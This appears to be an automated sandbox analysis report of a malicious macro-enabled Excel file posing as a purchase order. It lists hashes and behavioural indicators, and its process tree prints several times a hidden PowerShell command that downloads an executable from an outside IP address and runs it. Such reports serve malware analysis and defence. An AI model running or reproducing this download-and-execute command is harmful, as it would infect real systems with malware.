Analysis
-
max time kernel
144s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-09-2024 08:22
Behavioral task
behavioral1
Sample
SOA_PO#8829921199.xlsm
Resource
win7-20240903-en
General
-
Target
SOA_PO#8829921199.xlsm
-
Size
165KB
-
MD5
c0a096ce5928bce34fffd5874093f235
-
SHA1
971a8fbd841e42dcab84288205525b89301825c2
-
SHA256
54929de588e37191bfc6dd0bf4f3edc1fca58c67af0e6bc7b1bd15a66d8c1bf0
-
SHA512
9d7c5aaf2fe546422ff3379169909929ec50f6eebba27d527178066c943ea2973a72c7501202b9502c8ccd646dfe6b49c1194c34b8f9822404bf1fad6971eb61
-
SSDEEP
3072:BJNjJehd8PiRjkctohQQRBK0BvyixmZ49ke+jJLNkYa6+Rc64d:BJN06iactuRbB6M9+1GYaza64d
Malware Config
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2692 1716 powershell.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3028 1716 powershell.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 836 1716 powershell.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2132 1716 powershell.exe 32 -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2692 powershell.exe 3028 powershell.exe 836 powershell.exe 2132 powershell.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2120 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2692 powershell.exe 3028 powershell.exe 836 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE 2120 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2120 wrote to memory of 1260 2120 EXCEL.EXE 30 PID 2120 wrote to memory of 1260 2120 EXCEL.EXE 30 PID 2120 wrote to memory of 1260 2120 EXCEL.EXE 30 PID 2120 wrote to memory of 1260 2120 EXCEL.EXE 30
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SOA_PO#8829921199.xlsm1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58cf55243303865183755b5cb9d5c0a67
SHA1eabfbc431de10b82953ddc880d724466b4109edc
SHA256fe232c410fb65c1315816e967455853d07dec6cbda6da272835b5f11edc7b684
SHA512a2cd0fa83df920a90d50d0b64a1888fa9c807b1ee24723a7235666ae52622246797c59472b483beb4e320b2880a6392177b4e7c6246407093b25f3910aa2182b